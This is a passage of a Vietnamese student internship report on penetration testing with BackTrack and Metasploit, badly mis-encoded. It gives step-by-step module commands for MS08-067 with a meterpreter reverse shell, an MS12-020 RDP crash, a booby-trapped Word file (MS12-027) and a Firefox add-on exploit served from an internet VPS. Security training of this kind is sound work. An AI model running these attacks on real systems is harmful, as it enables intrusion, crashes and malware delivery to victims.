ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

µþá´Ç cáo cuối kỳ

Download as DOCX, PDF
Anthony Nguyen
Anthony Nguyen
1 of 33
Downloaded 12 times
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | i SVTH: Nguyá»…n Văn Tiến TRÃCH YẾU Hiện nay trong thá»i đại công nghệ thông tin vấn Ä‘á» an toàn và bảo mật thông tin của má»i cá nhân, doanh nghiệp, cÆ¡ quan, tổ chức … được quan tâm hàng đầu. Do việc nhu cầu trao đổi thông tin giữa các cá nhân, tổ chức … ngày càng cao vì vậy vấn Ä‘á» bảo mật là rất cần thiết. Nếu an ninh mạng không được quan tâm đúng mức sẽ có nhiá»u vấn Ä‘á» nghiêm trá»ng xảy ra nhÆ° xâm nhập bất hợp pháp, đánh cấp dữ liệu, tấn công, lừa đảo… Má»™t trong những cách để hạn chế những vấn đỠđó là luôn kiểm tra hệ thống, cài đặt phần má»m có license, cài đặt các bản vá… Trong thá»i gian thá»±c tập 8 tuần từ ngày 12/05/2014 đến ngày 05/07/2014 tôi đã hoàn thành đồ án “ Nghiên cứu và sá»­ dụng Backtrack để kiểm tra an ninh mạngâ€. Quá trình thá»±c tập giúp tôi hiểu được vá» công việc của những ngÆ°á»i kiểm tra hệ thống mạng và tôi có thể vận dụng những kiến thức đã được há»c vào thá»±c tế. Bên cạnh đó, tôi há»c há»i được nhiá»u thứ trong cuá»™c sống từ các bạn thá»±c tập chung và đặt biệt biệt là thầy Võ Äá»— Thắng. Tôi cam kết kết quả của đồ án là do tôi thá»±c hiện dÆ°á»›i sá»± hÆ°á»›ng dẫn của thầy Võ Äá»— Thắng(Giám đốc Trung tâm đào tạo Quản trị mạng và an ninh mạng Quốc tế Athena) không sao chép của ngÆ°á»i khác. Các bÆ°á»›c của quá trình thá»±c hiện được ghi lại bằng những Ä‘oạn phim ngắn và có thuyết minh. Danh sách các Ä‘oạn phim: Cài đặt Backtrack 5R3 https://www.youtube.com/watch?v=etNV0jf7sFk Các công cụ thu thập thông tin: https://www.youtube.com/watch?v=CePaGIHRhog Khai thác lổ há»ng MS08_067: https://www.youtube.com/watch?v=t0t8A0OPtoU Khai thác lổ há»ng MS12_020: https://www.youtube.com/watch?v=ZArVYCUj9BU Khai thác lổ há»ng MS12_027: https://www.youtube.com/watch?v=yLHvLe-olOM Cài Metasploit trên VPS: https://www.youtube.com/watch?v=YMqkg3duLQ8 Khai thác lá»— há»ng của firefox_xpi_bootstrapped qua mạng internet có sá»­ dụng backdoor: https://www.youtube.com/watch?v=4oNY9pUmeb0
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | ii SVTH: Nguyá»…n Văn Tiến MỤC LỤC ChÆ°Æ¡ng Mở Äầu: GIỚI THIỆU VỀ BACKTRACK.........................................1 I. Giá»›i thiệu .................................................................................................1 II. Cài đặt......................................................................................................1 ChÆ°Æ¡ng 1: THU THẬP THÔNG TIN VÀ KHAI THÃC Lá»– HỎNG CỦA HỆ ÄIỀU HÀNH WINDOWS TRONG MẠNG LAN.........................................................4 I. Giá»›i thiệu .................................................................................................4 II. Thu thập thông tin....................................................................................5 1. Liệt kê dịch vụ......................................................................................5 2. Xác định phạm vi mạng........................................................................5 3. Xác định host có Ä‘ang mở hay không ..................................................6 4. Các dịch vụ...........................................................................................6 5. Xác Ä‘inh hệ Ä‘iá»u hành..........................................................................6 6. Nhận diện các dịch vụ ..........................................................................7 7. Äánh giá các mối Ä‘e dá»a ......................................................................7 III. Khai thác lá»— há»ng qua mạng Lan.............................................................8 1. Khai thác lá»— há»ng MS08_067...............................................................8 2. Khai thác lá»— há»ng MS12_020.............................................................11 3. Khai thác lá»— há»ng MS12_027.............................................................13 ChÆ°Æ¡ng 2: XÂY Dá»°NG HONEYPOT ÄỂ XÂM NHẬP QUA MẠNG INTERNET 17 I. Giá»›i thiệu vá» Honeypot..........................................................................17 II. Xâm nhập qua mạng internet bằng Honeypot .......................................17 1. Cài đặt Metasploit trên VPS...............................................................17 2. Khai thác qua mạng internet...............................................................21 3. Backdoor.............................................................................................23
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | iii SVTH: Nguyá»…n Văn Tiến Lá»i Cảm Æ n Khoa Công Nghệ Thông Tin và Truyá»n Thông TrÆ°á»ng Äại há»c Cần ThÆ¡ Em xin chân thành cảm Æ¡n Khoa Công nghệ thông tin và Truyá»n thông trÆ°á»ng Äại há»c Cần ThÆ¡ đã tạo Ä‘iá»u kiện cho em hoàn thành tốt đợt thá»±c tập thá»±c tế này. Trong đợt thá»±c tập này đã giúp em có nhiá»u kinh nghiệm thá»±c tế trong há»c tập và cuá»™c sống. Những kinh nghiệm đó sẽ giúp em hiểu rõ và định hÆ°á»›ng cho công việc sau này. Bên cạnh đó, em xin cảm Æ¡n các Thầy Cô khoa CNTT&TT đã tận tình giảng dạy và trang bị cho em những kiến thức cần thiết và há»— trợ cho em hoàn thành Ä‘á» tài này. Trong quá trình thá»±c tập thá»±c tế đã hoàn thành nhÆ°ng không tránh khá»i những phần sai sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn thiện hÆ¡n trong công việc và cuá»™c sống. Em xin chân thành cảm Æ¡n! Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014 Sinh viên thá»±c tập Nguyá»…n Văn Tiến
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | iv SVTH: Nguyá»…n Văn Tiến Lá»i Cảm Æ¡n Trung Tâm Äào Tạo Quản Trị Mạng và An Ninh Mạng Quốc tế ATHENA Em xin chân thành cảm Æ¡n Trung tâm đào tạo Quản trị mạng và An ninh mạng Quốc tế Athena đã tạo Ä‘iá»u kiện cho em thá»±c tập thá»±c tế nÆ¡i đây. Em đã nhận được sá»± há»— trợ nhiệt tình vá» cÆ¡ sở vật chất cÅ©ng nhÆ° chuyên môn. Em xin bày tá» lòng biết Æ¡n đến quý Thầy Cô của trung tâm,đặt biệt là thầy Võ Äá»— Thắng đã chỉ dạy tận tình giúp em hoàn thành Ä‘á» tài này. Trong quá trình thá»±c tập thá»±c tế đã hoàn thành nhÆ°ng không tránh khá»i những phần sai sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn thiện hÆ¡n trong công việc và cuá»™c sống. Em xin chân thành cảm Æ¡n! Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014 Sinh viên thá»±c tập Nguyá»…n Văn Tiến
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | v SVTH: Nguyá»…n Văn Tiến Giáo viên hÆ°á»›ng dẫn thầy Võ Äá»— Thắng(phải) và sinh viên thá»±c tập Nguyá»…n Văn Tiến
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | vi SVTH: Nguyá»…n Văn Tiến NHẬN XÉT CỦA GIÃO VIÊN ---------oo0oo--------- ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. .................................................................................................................................
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | vii SVTH: Nguyá»…n Văn Tiến GIỚI THIỆU TRUNG TÂM ATHENA 1. Giá»›i thiệu Trung Tâm Äào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là má»™t tổ chức qui tụ nhiá»u trí thức trẻ Việt Nam đầy năng Ä‘á»™ng, nhiệt huyết và kinh nghiệm trong lãnh vá»±c CNTT, vá»›i tâm huyết góp phần vào công cuá»™c thúc đẩy tiến trình Ä‘Æ°a công nghệ thông tin là ngành kinh tế mÅ©i nhá»n, góp phần phát triển nÆ°á»›c nhà . 2. LÄ©nh vá»±c hoạt Ä‘á»™ng Trung tâm ATHENA đã và Ä‘ang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thÆ°Æ¡ng mại Ä‘iện tá»­ theo các tiêu chuẩn quốc tế của các hãng nổi tiếng nhÆ° Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chÆ°Æ¡ng trình đào tạo cao cấp dành riêng theo Ä‘Æ¡n đặt hàng của các Ä‘Æ¡n vị nhÆ° Bá»™ Quốc Phòng, Bá»™ Công An , ngân hàng, doanh nghiệp, các cÆ¡ quan chính phủ, tổ chức tài chính… Sau gần 10 năm hoạt Ä‘á»™ng,nhiá»u há»c viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiá»u bá»™ ngành nhÆ° Cục Công Nghệ Thông Tin - Bá»™ Quốc Phòng , Bá»™ Công An, Sở Thông Tin Truyá»n Thông các tỉnh, bÆ°u Ä‘iện các tỉnh,… Ngoài chÆ°Æ¡ng trình đào tạo, Trung tâm ATHENA còn có nhiá»u chÆ°Æ¡ng trình hợp tác và trao đổi công nghệ vá»›i nhiá»u đại há»c lá»›n nhÆ° đại há»c Bách Khoa Thành Phố Hồ CHính Minh, Há»c Viện An Ninh Nhân Dân( Thủ Äức), Há»c Viện BÆ°u Chính Viá»…n Thông, Hiệp há»™i an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sá»± ,... 3. Äá»™i ngÅ© giảng viên Tất cả các giảng viên trung tâm ATHENA có Ä‘á»u tốt nghiệp từ các trÆ°á»ng đại há»c hàng đầu trong nÆ°á»›c .... Tất cả giảng viên ATHENA Ä‘á»u phải có các chứng chỉ quốc tế nhÆ° MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sÆ° phạm Quốc tế (Microsoft Certified Trainer). Äây là các chứng chỉ chuyên môn bắt buá»™c để đủ Ä‘iá»u kiện tham gia giảng dạy tại trung tâm ATHENA.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | viii SVTH: Nguyá»…n Văn Tiến Bên cạnh đó, các giảng viên ATHENA thÆ°á»ng Ä‘i tu nghiệp và cập nhật kiến thức công nghệ má»›i từ các nÆ°á»›c tiên tiến nhÆ° Mỹ , Pháp, Hà Lan, Singapore,... và truyá»n đạt các công nghệ má»›i này trong các chÆ°Æ¡ng trình đào tạo tại trung tâm ATHENA. 4. CÆ¡ sở vật chất Thiết bị đầy đủ và hiện đại. ChÆ°Æ¡ng trình cập nhật liên tục, bảo đảm há»c viên luôn tiếp cận vá»›i những công nghệ má»›i nhất. Phòng máy rá»™ng rãi, thoáng mát. 5. Dịch vụ Äảm bảo việc làm cho há»c viên tốt nghiệp khoá dài hạn. Giá»›i thiệu việc làm cho má»i há»c viên. Thá»±c tập có lÆ°Æ¡ng cho há»c viên khá giá»i. Ngoài giá» há»c chính thức, há»c viên được thá»±c hành thêm miá»…n phí, không giá»›i hạn thá»i gian. Há»— trợ kỹ thuật không thá»i hạn trong tất cả các lÄ©nh vá»±c liên quan đến máy tính, mạng máy tính, bảo mật mạng. Há»— trợ thi Chứng chỉ Quốc tế. 6. Liên hệ CÆ¡ sở 1: 92 Nguyá»…n Äình Chiểu, phÆ°á»ng Äa Kao, Quận 1. Äiện thoại: 090 78 79 477 - 094 323 00 99 - (08)38244041. CÆ¡ sở 2: 2 Bis Äinh Tiên Hoàng, phÆ°á»ng Äa Kao, Quận 1. Äiện thoại: 094 320 00 88 - (08)22 10 38 01. Website: http://athena.edu.vn - http://athena.com.vn E-mail : support@athena.edu.vn - tuvan@athena.edu.vn
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 1 SVTH: Nguyá»…n Văn Tiến ChÆ°Æ¡ng Mở Äầu: GIỚI THIỆU VỀ BACKTRACK I. Giá»›i thiệu Backtrack là má»™t bản phân phối dạng Live DVD của Linux, được phát triển để thá»­ nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sá»­ dụng có thể Backtrack trá»±c tiếp từ Ä‘Ä©a DVD mà không cần cài nó vào máy của bạn. Backtrack cÅ©ng có thể được cài đặt vào ổ cứng và sá»­ dụng nhÆ° má»™t hệ Ä‘iá»u hành. Backtrack là sá»± hợp nhất giữa 3 bản phân phối khác nhau của Linux vá» thâm nhập thá»­ nghiệm -IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện là Backtrack 5R3 được phát hành vào tháng 8 năm 2012 bổ sung hÆ¡n 60 công cụ má»›i. Má»™t số thay đổi đáng chú ý bao gồm các công cụ thá»­ nghiệm xâm nhập Ä‘iện thoại di Ä‘á»™ng, giao diện đồ há»a cho công cụ crack- wifi, má»™t thể loại hoàn toàn má»›i là công cụ khai thác vật lý. II. Cài đặt Nếu chúng ta muốn sá»­ dụng Backtrack mà không cần cài nó vào ổ cứng hay Live DVD, chúng ta có thể ghi tập tin ảnh ISO vào Ä‘Ä©a DVD và khởi Ä‘á»™ng máy tính của bạn vá»›i DVD. Backtrack sau đó sẽ chạy từ Ä‘Ä©a DVD. Lợi thế của việc sá»­ dụng Backtrack là má»™t DVD Live là nó là rất dá»… dàng. Tuy nhiên, phÆ°Æ¡ng pháp này cÅ©ng có má»™t số nhược Ä‘iểm. Backtrack có thể không làm việc vá»›i phần cứng và thay đổi cấu hình nào được thá»±c hiện trên phần cứng để làm việc sẽ không được lÆ°u vá»›i Ä‘Ä©a DVD Live. Ngoài ra, nó là chậm vì máy tính cần phải tải các chÆ°Æ¡ng trình từ Ä‘Ä©a DVD. Cài đặt trong máy ảo. Äiểm thuận lợi là chúng ta có thể dá»… dàng sá»­ dụng Backtrack vá»›i hệ Ä‘iá»u hành hiện tại. Khuyết Ä‘iểm là tốc Ä‘á»™ chậm, không dùng được wireless trừ USB wireless. Ở đây tôi cài Backtrack 5R3 trên máy ảo VMWare. Sau đây là má»™t số hình ảnh khi cài đặt Backtrack 5R3 Tạo máy ảo Backtrack
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 2 SVTH: Nguyá»…n Văn Tiến Äặt tên và chá»n nÆ¡i lÆ°u máy ảo. Sau đó chúng ta hoàn thành các tùy chá»n của máy ảo, tiếp theo chúng ta sẽ mở máy ảo lên. Chá»n chế Ä‘á»™ boot “text mode†và đăng nhập vào Backtrack vá»›i username :root và password là toor. Gõ “startx†để vào giao diện đồ há»a .Sau đó chúng ta nhấn vào Install trên màn hình để cài đặt.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 3 SVTH: Nguyá»…n Văn Tiến Sauk hi Ä‘iá»n các thông tin vá» ngôn ngữ, múi giá», bàn phím, phân vùng ổ cứng thì sau đó ta bấm vào nút install để cài đặt Giao diện của BackTrack sau khi cài đặt hoàn thành trên VMWare
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 4 SVTH: Nguyá»…n Văn Tiến ChÆ°Æ¡ng 1: THU THẬP THÔNG TIN VÀ KHAI THÃC Lá»– HỎNG CỦA HỆ ÄIỀU HÀNH WINDOWS TRONG MẠNG LAN I. Giá»›i thiệu Äầu tiên hacker tiến hành thu thập thông tin vá» hạ tầng của mục tiêu, mô hình của các Web Server, kiểu giao tiếp thông tin thông qua các cổng (port) nào, những site liên quan đến việc thá»±c hiện chức năng của site mục tiêu... Việc thu thập thông tin là vấn Ä‘á» quan trá»ng cho việc tấn công vào má»™t hệ thống máy mục tiêu. Cho dù hacker tấn công theo phÆ°Æ¡ng diện phần cứng hay qua ứng dụng thì việc thu thập vẫn là cần thiết. FootPrinting (In dấu ấn - thu thập thông tin): Là bÆ°á»›c mà kẻ tấn công thâu tóm càng nhiá»u thông tin càng tốt vỠđối tượng, ngÆ°á»i dùng, doanh nghiệp, các chi nhánh của công ty, máy chủ… bao gồm các chi tiết: Domain Name, Äịa chỉ IP, Networking Prototcols…Äây là má»™t bÆ°á»›c quan trá»ng: Cho hacker nhiá»u thông tin, đôi khi vá»›i những thông tin này hacker đã có thể làm chủ hệ thống. Sá»­ dụng công cụ Nslookup, SmartWhois… Sanning (Quét thăm dò mạng): là quá trình tìm hiểu thông tin vá» các live host trên mạng để giúp hacker quyết định kiểu tấn công nào vào hệ thống. Trong quá trình Scanning hacker sẽ tìm hiểu thông tin vá»: địa chỉ IP, cổng, hệ Ä‘iá»u hành, network, … Enumeration (Äiểm danh mạng - liệt kê tìm lá»— hổng): Äến đây, các hacker bắt đầu kiểm soát server sÆ¡ bá»™. BÆ°á»›c này là quá trình tập hợp và phân tích tên ngÆ°á»i dùng, tên máy,tài nguyên chia sẽ và các dịch vụ. Sau đó tìm kiếm những tài nguyên được bảo vệ kém, hoặc tài khoản ngÆ°á»i dùng mà có thể sá»­ dụng để xâm nhập, bao gồm các mật khẩu mặc định, các script và dịch vụ mặc định.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 5 SVTH: Nguyá»…n Văn Tiến II. Thu thập thông tin 1. Liệt kê dịch vụ Là tiến trình thu thập thông tin từ mạng, cho phép thu thập thông tin vá» tổ chức nhÆ° tên ngÆ°á»i dùng, tên máy tính, địa chỉ IP, mail server… 2. Xác định phạm vi mạng Xác định phạm vi các địa chỉ IP từ mạng của mục tiêu Sá»­ dụng Dmitry để lấy thông tin từ mục tiêu, sá»­ dụng –wnsp để tra cứu lấy tên miá»n và quét cổng.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 6 SVTH: Nguyá»…n Văn Tiến Sá»­ dụng “scapy†để xác định traceroute. Scapy : mở scapy res,unans=traceroute(["www.athena.edu.vn"],dport=[80,443],maxttl=20): xác định Ä‘Æ°á»ng Ä‘i của gói tin đến Athena.edu.vn vá»›i port là 80 và 443, maxttl là 20. res.graph() :hiển thị Ä‘Æ°á»ng Ä‘i gói tin 3. Xác định host có Ä‘ang mở hay không Chúng ta có thể sá»­ dụng lệnh ping đến mục tiêu. Nmap –sP [ip đích] : -sP giúp xâm nhập mạng mục tiêu nhanh chóng, giúp cho chúng ta biết host đó có up hay không. Tùy chá»n sP sẽ gá»­i gói tin ICMP echo request và 1 gói tin TCP ACK tá»›i cổng 80. 4. Các dịch vụ Äể xem các dịch vụ nào Ä‘ang mở trên đối tượng ta sá»­ dụng Nmap [địa chỉ ip đích] Hay Nmap –p 1-1000 [địa chỉ ip đích] tìm port từ 1 đến 1000 có port nào Ä‘ang mở hay không. Chúng ta cÅ©ng có thể scan 1 port nào đó nmap –p 80 [địa chỉ ip] 5. Xác Ä‘inh hệ Ä‘iá»u hành Chúng ta đã biết được địa chỉ IP , máy hoạt Ä‘á»™ng, xác định được các cổng mở của mục tiêu, bÆ°á»›c tiếp theo là chúng ta xác định hệ Ä‘iá»u hành nào Ä‘ang chạy để cung
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 7 SVTH: Nguyá»…n Văn Tiến cấp cho quá trình khac thác lá»— hổng. Nmap –O [địa chỉ IP] 6. Nhận diện các dịch vụ Xác định các dịch vụ dá»±a trên các cổng đã nhận diện 7. Äánh giá các mối Ä‘e dá»a Backtrack sá»­ dụng công cụ Metalgo, cung cấp thông tin tổng hợp từ bên trong lẫn bên ngoài để có thông tin rõ ràng vá» mối de doa.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 8 SVTH: Nguyá»…n Văn Tiến III. Khai thác lá»— há»ng qua mạng Lan Äặc Ä‘iểm chung của má»™t hệ thống mạng là có nhiá»u ngÆ°á»i sá»­ dụng chung và phân tán vá» mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sá»­ dụng không hợp lệ) phức tạp hÆ¡n nhiá»u so vá»›i việc môi trÆ°á»ng má»™t máy tính Ä‘Æ¡n lẻ, hoặc má»™t ngÆ°á»i sá»­ dụng. Hoạt Ä‘á»™ng của ngÆ°á»i quản trị hệ thống mạng phải đảm bảo các thông tin trên mạng là tin cậy và sá»­ dụng đúng mục đích, đối tượng đồng thá»i đảm bảo mạng hoạt Ä‘á»™ng ổn định không bị tấn công bởi những kẻ phá hoại. NhÆ°ng trên thá»±c tế là không má»™t mạng nào đảm bảo là an toàn tuyệt đối, má»™t hệ thống dù được bảo vệ chắc chắn đến mức nào thì cÅ©ng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu. 1. Khai thác lá»— há»ng MS08_067 Khai thác trá»±c tiếp lên dịch vụ, đây là dịch vụ chia sẽ file trên Windows được mở mặc định(port 445), attacker có thể làm tràn bá»™ đệm và thá»±c thi má»™t mã lệnh từ xa. Các hê Ä‘iá»u hành bị ảnh hưởng : Windows 2000 sp4, Windows 2000 SP4, XP
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 9 SVTH: Nguyá»…n Văn Tiến SP2 và SP3, Server 2003 SP1 và SP2, Vista SP1… Các bÆ°á»›c thá»±c hiện khai thác: Chúng ta mở msfconsole lên. Tiếp theo là chúng ta gõ: use exploit/windows/smb/ms08_067_netapi Chúng ta show options để sem các tùy chá»n của nó. Tiếp đó chúng ta set RHOST (địa chỉ IP của máy nạn nhân) .
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 10 SVTH: Nguyá»…n Văn Tiến Chúng ta set payload windows/meterpreter/reverse_rtcp Chúng ta set LHOST (địa chỉ IP của attacker). Và show targets để xem các tuy chá»n.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 11 SVTH: Nguyá»…n Văn Tiến Chúng ta khai thác máy nạn nhân là winxp Sp3 nên tùy chá»n là 5. Và cuối cung là exploit để khai thác. Và bây giá» chúng ya có thể xâm nhập vào máy win XP. Cách phong tránh là tắt các cổng không sá»­ dụng. Cập nhật các bản vá. Cài các phần má»m có mua bản quyá»n. 2. Khai thác lá»— há»ng MS12_020 Do gá»­i các gói tin RDP đến đối tượng đích được khởi tạo không đúng cách hoặc bị xóa, gây ra tình trạng máy tính bị lá»—i màn hình xanh và khởi Ä‘á»™ng lại. Các hệ Ä‘iá»u hành bị ảnh hưởng: Windows XP SP2 and SP3, Windows Server
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 12 SVTH: Nguyá»…n Văn Tiến 2003 SP2, Windows Vista SP2, Windows Server 2008 … Quá trình thá»±c hiện: Sá»­ dụng lệnh: use auxiliary/dos/windows/rdp/ms12_020_maxchanelids Tiếp theo ta gõ: “show options†để xem các tùy chá»n Chúng ta gõ: “set RHOST [địa chỉ IP máy nạn nhân]†Cuối cùn là “run†để thÆ°c hiện. Chúng ta sẽ qua máy Win XP và thấy màn hình xanh
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 13 SVTH: Nguyá»…n Văn Tiến Bên máy attacker thì báo hệ thống đã bị đánh sập. Cách phòng tránh là: cập nhật bản vá lá»—i, tắt port 3389, cài chÆ°Æ¡ng trình diệt virus… 3. Khai thác lá»— há»ng MS12_027 Lá»—i do định dạng file trên office. Các phần má»m bị ảnh hưởng :Office 2003 SP3, Office 2007 SP2, Office 2007 SP3, Office 2010 SP1... Quá trình thá»±c hiện: sá»­ dụng Backtrack 5r3 làm attacker và 1 máy Win XP SP2 có cài Office 2007 làm victim. Trên Metasploit console chúng ta gõ lệnh : “use exploit/windows/fileformat/ms12_027_mscomctl_bofâ€
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 14 SVTH: Nguyá»…n Văn Tiến Äặt tên của file word tùy ý vá»›i phần mở rá»™ng â€.doc†Tiếp theo là “set payload windows/meterpreter/reverse_tcp†Äịa chỉ IP của attacker: “set LHOST [IP máy attack] và tiếp theo là exploit để tao ra fileword có chứa mã Ä‘á»™c. Dùng lệnh cp để chuyển file này ra Desktop cho dá»… dang sá»­ dụng. Ta copy file word đã được tạo vào Ä‘Æ°á»ng dẫn /var/www/
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 15 SVTH: Nguyá»…n Văn Tiến Chúng ta start dich vụ web lên. Tiếp theo chúng ta tạo ra 1 lắng nge: “ use exploit/multi/handler†Và “ set payload windows/meterpreter/reverse_tcp†“set LHOST [IP của attacker]†Máy nạn nhân truy cập vào Ä‘Æ°á»ng dẫn chứa file word và tải file đó vá» Sauk hi tai vá» thì mở file đó lên
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 16 SVTH: Nguyá»…n Văn Tiến Chúng ta thấy trên máy attack có 1 sessions được tạo ra. Attacker kết nối vào và thá»±c hiên tấn công.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 17 SVTH: Nguyá»…n Văn Tiến ChÆ°Æ¡ng 2: XÂY Dá»°NG HONEYPOT ÄỂ XÂM NHẬP QUA MẠNG INTERNET I. Giá»›i thiệu vá» Honeypot Honeypot là má»™t hệ thống tài nguyên thông tin được xây dá»±ng vá»›i mục đích giả dạng đánh lừa những kẻ sá»­ dụng và xâm nhập không hợp pháp, thu hút sá»± chú ý của chúng, ngăn không cho chúng tiếp xúc vá»›i hệ thống thật. Hệ thống tài nguyên thông tin có nghÄ©a là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào nhÆ° là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trá»±c tiếp tÆ°Æ¡ng tác vá»›i tin tặc và tìm cách khai thác thông tin vá» tin tặc nhÆ° hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công. Vá»›i mục tiêu xây dá»±ng Honeypot để xâm nhập vào lá»— hổng hệ thống máy tính qua Internet, Hacker có thể sá»­ dụng Máy chủ ảo (VPS) và cài đặt Metasploit để trở thành Honeypot và giả dạng là má»™t Web server bình thÆ°á»ng, từ đó đánh lừa máy nạn nhân khi má»™t máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà hacker cung cấp. II. Xâm nhập qua mạng internet bằng Honeypot 1. Cài đặt Metasploit trên VPS Quá trình cài đặt Metasploit trên máy VPS: ở đây tôi sá»­ dụng phiên bản Metasploit 4.6.1. Yêu cầu đầu tiên là tắt các chÆ°Æ¡ng trình diệt virus và tÆ°á»ng lá»­a. Giao diện Welcome chúng ta chon “Nextâ€
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 18 SVTH: Nguyá»…n Văn Tiến License Agreement chá»n “ I accept the agreement†chá»n “Next†Tạo ra 1 thÆ° mục metasploit trên ổ C:, chá»n Next
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 19 SVTH: Nguyá»…n Văn Tiến Ở đây Metasploit sá»­ SSL port là 3790 Tạo ra 1 Webserver vá»›i server name “localhost†và ngày hết hạn 3650, chúng ta cÅ©ng có thể thay đổi ngày hết hạn của nó. Quá trình cài đặt Ä‘ang diá»…n ra
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 20 SVTH: Nguyá»…n Văn Tiến Quá trình cài đặt đã hoàn tất.
Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 21 SVTH: Nguyá»…n Văn Tiến 2. Khai thác qua mạng internet Dá»±a vào những lá»—i trên trình duyệt ngÆ°á»i tấn công sá»­ dụng phÆ°Æ¡ng pháp nào đó làm cho các nạn nhân truy cập vào Ä‘Æ°á»ng dẫn có chứa mã Ä‘á»™c hay thá»±c thi các mã Ä‘á»™c đó. Tôi thÆ°c hiện khai thác lá»— há»ng qua trình duyệt firefox dá»±a trên lá»—i add on của firefox: ta sá»­ dụng máy WinXP có cài firefox(tất cả các phiên bản Ä‘iá»u được) và VPS đã được cài Metasploit (Honeypot): Trên VPS chúng ta mở msfconsole : “use exploit/multi/browser/firefox_xpi_bootstrapped_addonâ€
